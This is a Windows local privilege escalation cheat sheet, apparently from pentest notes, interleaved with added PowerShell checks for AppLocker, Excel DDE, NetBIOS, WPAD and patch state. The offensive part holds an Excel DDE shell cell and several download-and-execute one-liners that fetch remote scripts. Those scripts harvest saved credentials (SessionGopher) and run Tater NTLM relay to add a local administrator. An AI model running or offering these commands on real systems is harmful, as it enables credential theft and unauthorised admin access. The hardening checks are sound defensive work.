7 - Local-Privilege-Escalation.md
Get a cmd shell in Internet Explorer:

Enter in address bar:

file://C:\Windows\System32\cmd.exe

Get a cmd.exe shell using Excel:

Place this in a cell and press enter:

=cmd|' /k cmd.exe'!'A1'

Get a cmd.exe or PowerShell shell using Windows search:

Press the Windows key and type the search term. Note that admins frequently block cmd.exe and PowerShell but forget to block PowerShell ISE.
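The three shell tricks above all depend on an interpreter the host's application control forgot to cover, or on an Office feature left at its default. The following check is an added example and is not part of the original cheat sheet: it reports whether the effective AppLocker policy names cmd.exe, powershell.exe and powershell_ise.exe at all, and whether the Excel DDE mitigation values Microsoft documents for Office (DisableDDEServerLaunch, DisableDDEServerLookup) are set for the current user. It assumes AppLocker is the control in use and that the AppLocker cmdlets are available on the host.

```powershell
# Added defensive check, not code from the original cheat sheet.
# Assumes AppLocker is the application-control mechanism (Get-AppLockerPolicy
# needs the AppLocker cmdlets, present on supported Windows editions) and that
# Excel DDE is mitigated through the DisableDDEServer* values under
# HKCU\Software\Microsoft\Office\<version>\Excel\Security.

function Test-ShellInterpreterCoverage {
    # Interpreters reached via the IE file:// trick, the Excel DDE cell and
    # Windows Search. ISE is the one most often left out of a policy.
    $interpreters = 'cmd.exe', 'powershell.exe', 'powershell_ise.exe'
    $results = @()
    try {
        $policyXml = Get-AppLockerPolicy -Effective -Xml
    } catch {
        Write-Warning "AppLocker cmdlets unavailable or no effective policy: $($_.Exception.Message)"
        $policyXml = ''
    }
    foreach ($exe in $interpreters) {
        # A binary name that appears in no rule is never denied by path or
        # publisher rule; that is the gap to report.
        $mentioned = $policyXml -match [regex]::Escape($exe)
        $results += [pscustomobject]@{
            Check  = "AppLocker rule references $exe"
            Status = if ($mentioned) { 'present' } else { 'MISSING' }
        }
    }
    $results
}

function Test-ExcelDdeMitigation {
    # DDE server launch is what the =cmd|' /k cmd.exe'!'A1' cell relies on.
    $results = @()
    $officeRoots = Get-ChildItem 'HKCU:\Software\Microsoft\Office' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^\d+\.\d+$' }   # e.g. 16.0
    if (-not $officeRoots) {
        $results += [pscustomobject]@{ Check = 'Excel DDE mitigation'; Status = 'Office not found for this user' }
        return $results
    }
    foreach ($root in $officeRoots) {
        $secKey = "HKCU:\Software\Microsoft\Office\$($root.PSChildName)\Excel\Security"
        foreach ($name in 'DisableDDEServerLaunch', 'DisableDDEServerLookup') {
            $value = (Get-ItemProperty -Path $secKey -Name $name -ErrorAction SilentlyContinue).$name
            $results += [pscustomobject]@{
                Check  = "Office $($root.PSChildName) Excel\Security\$name"
                Status = if ($value -eq 1) { 'set (1)' } else { 'NOT SET' }
            }
        }
    }
    $results
}

@(Test-ShellInterpreterCoverage; Test-ExcelDdeMitigation) | Format-Table -AutoSize
```

A MISSING result for powershell_ise.exe next to present results for cmd.exe and powershell.exe is exactly the inconsistency the note above describes; the fix is to extend the same deny or allow-list rule to the ISE binary rather than to add a new policy.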

Get Windows Product Information

From the registry: reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"

Get Windows system information: systeminfo

Get Windows User and Domain Information

set

whoami /all

Enumerate local administrators

net localgroup administrators

Check for missing patches:

wmic qfe get Caption,Description,HotFixID,InstalledOn

Searchsploit:

searchsploit MS16 windows local

Browser creds: enum_ie, enum_chrome, etc. (Metasploit)

SessionGopher (FireEye) - Find Putty, WinSCP, RDP, creds.

https://github.com/fireeye/SessionGopher

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://bit.ly/2nrfTPI');Invoke-SessionGopher -AllDomain -o"

HotPotato (foxglovesec) - NBNS spoof, fake WPAD proxy, HTTP -> NTLM relay.

Reference: https://github.com/foxglovesec/Potato

PowerShell version, Tater:

https://github.com/Kevin-Robertson/Tater

Examples. Basic trigger 1:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://bit.ly/1UApMHF');Invoke-Tater -Trigger 1 -Command 'net user tater Winter2016 /add && net localgroup administrators tater /add'"

Basic trigger 2:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://bit.ly/1UApMHF');Invoke-Tater -Trigger 2 -Command 'net user tater Winter2016 /add && net localgroup administrators tater /add'"

Two-system setup to get around port 80 being in use on the privesc target:

WPAD system - 192.168.10.100 - this system only serves a wpad.dat file that directs HTTP traffic on the privesc target to the non-80 HTTP port.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://bit.ly/1UApMHF');Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command 'null'"

Privesc target - 192.168.10.101:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://bit.ly/1UApMHF');Invoke-Tater -Command 'net user Tater Winter2016 /add && net localgroup administrators Tater /add' -HTTPPort 8080 -SpooferIP 192.168.10.100"


PowerUp - many LPE checks

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mK64oH'); Invoke-AllChecks" > powerup.txt

Rotten Potato

Look for "SeImpersonatePrivilege":

whoami /priv
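The Potato notes above rest on three host conditions (NetBIOS name resolution answering NBNS, the WinHTTP WPAD service accepting a spoofed proxy, and a token holding SeImpersonatePrivilege) plus the patch state the `wmic qfe` query enumerates. The following posture check is an added example, not code from the cheat sheet or from the Potato/Tater projects: it reports each of those conditions from the defender's side so a host can be verified as hardened. It assumes an elevated PowerShell session on the host under review, the standard Windows service name WinHttpAutoProxySvc and its registry Start value, the Win32_NetworkAdapterConfiguration TcpipNetbiosOptions field, and a 60-day staleness threshold for hotfixes that is an arbitrary choice here.

```powershell
# Added defensive posture check, not code from the original cheat sheet.
# Assumptions: elevated PowerShell on the host being reviewed; standard
# Windows names for the WPAD service and registry key; 60-day hotfix
# threshold is an arbitrary value chosen for this example.

function Get-ImpersonationPrivilegeStatus {
    # Same signal as `whoami /priv`, parsed into an object. The last
    # whitespace-separated column is Enabled or Disabled.
    $line = whoami /priv | Where-Object { $_ -match '^SeImpersonatePrivilege\s' }
    [pscustomobject]@{
        Check  = 'Current token holds SeImpersonatePrivilege'
        Status = if ($line) { ($line -split '\s{2,}')[-1] } else { 'not held' }
    }
}

function Get-NbnsStatus {
    # TcpipNetbiosOptions: 0 = use DHCP setting, 1 = enabled, 2 = disabled.
    # NBNS spoofing only works while NetBIOS name resolution is active.
    Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
        ForEach-Object {
            [pscustomobject]@{
                Check  = "NetBIOS over TCP/IP on $($_.Description)"
                Status = switch ($_.TcpipNetbiosOptions) {
                    2       { 'disabled' }
                    1       { 'ENABLED' }
                    default { 'ENABLED (DHCP default)' }
                }
            }
        }
}

function Get-WpadStatus {
    # WinHttpAutoProxySvc performs Web Proxy Auto-Discovery; a spoofed WPAD
    # host is useless once it is disabled (Start = 4).
    $svc   = Get-Service -Name WinHttpAutoProxySvc -ErrorAction SilentlyContinue
    $start = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc' `
                  -Name Start -ErrorAction SilentlyContinue).Start
    [pscustomobject]@{
        Check  = 'WinHttpAutoProxySvc (WPAD)'
        Status = if ($start -eq 4) { 'disabled' }
                 elseif ($svc)     { "ENABLED ($($svc.Status))" }
                 else              { 'service not found' }
    }
}

function Get-PatchCurrency {
    # PowerShell equivalent of the `wmic qfe` query above; flags a host whose
    # newest hotfix is older than the (assumed) 60-day threshold.
    $latest = Get-HotFix | Where-Object { $_.InstalledOn } |
        Sort-Object InstalledOn -Descending | Select-Object -First 1
    $age = if ($latest) { (New-TimeSpan -Start $latest.InstalledOn -End (Get-Date)).Days } else { $null }
    [pscustomobject]@{
        Check  = 'Most recent hotfix'
        Status = if (-not $latest)    { 'none recorded' }
                 elseif ($age -gt 60) { "$($latest.HotFixID) installed $age days ago (STALE)" }
                 else                 { "$($latest.HotFixID) installed $age days ago" }
    }
}

@(Get-ImpersonationPrivilegeStatus; Get-NbnsStatus; Get-WpadStatus; Get-PatchCurrency) |
    Format-Table -AutoSize
```

Read the output top to bottom: an enabled SeImpersonatePrivilege on a service-account token is expected and by itself not a finding, but combined with NBNS enabled, WPAD running and a stale patch level it describes the exact host the HotPotato and Tater commands above are written for. Disabling NetBIOS over TCP/IP and the WinHttpAutoProxySvc service removes the spoofing path; installing the MS16-075 update closes the local NTLM reflection it relays into.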